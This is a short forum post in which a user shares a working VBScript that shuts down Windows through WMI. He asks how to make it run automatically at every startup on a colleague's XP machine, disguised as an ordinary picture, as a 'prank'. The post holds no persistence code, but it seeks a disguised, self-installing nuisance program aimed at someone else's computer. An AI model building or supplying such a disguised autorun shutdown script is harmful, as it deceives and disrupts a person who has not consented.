| |
candyman
Posts: 3
Score: 0
Joined: 11/5/2006
Status: offline
|
haai people... I have a simple script Set OpSysSet = GetObject("winmgmts:{(Shutdown)}!\\.\root\cimv2").ExecQuery _ ("select * from Win32_OperatingSystem where Primary=true") for each OpSys in OpSysSet OpSys.Shutdown() next WScript.Echo "bye bye .. greetz u neighboor;)" i want to tease a colleage of mine. now is my question, is there a script that automatically write's the script to a place so xp runs it every time when he start's his computer.... hope so would be lots of fun 2 see him sweat ^^ and maybe let him see a standard xp picture so he wouldn't notice that he is clicking a script. plz let me know if anyone knows a way tnx u
|
|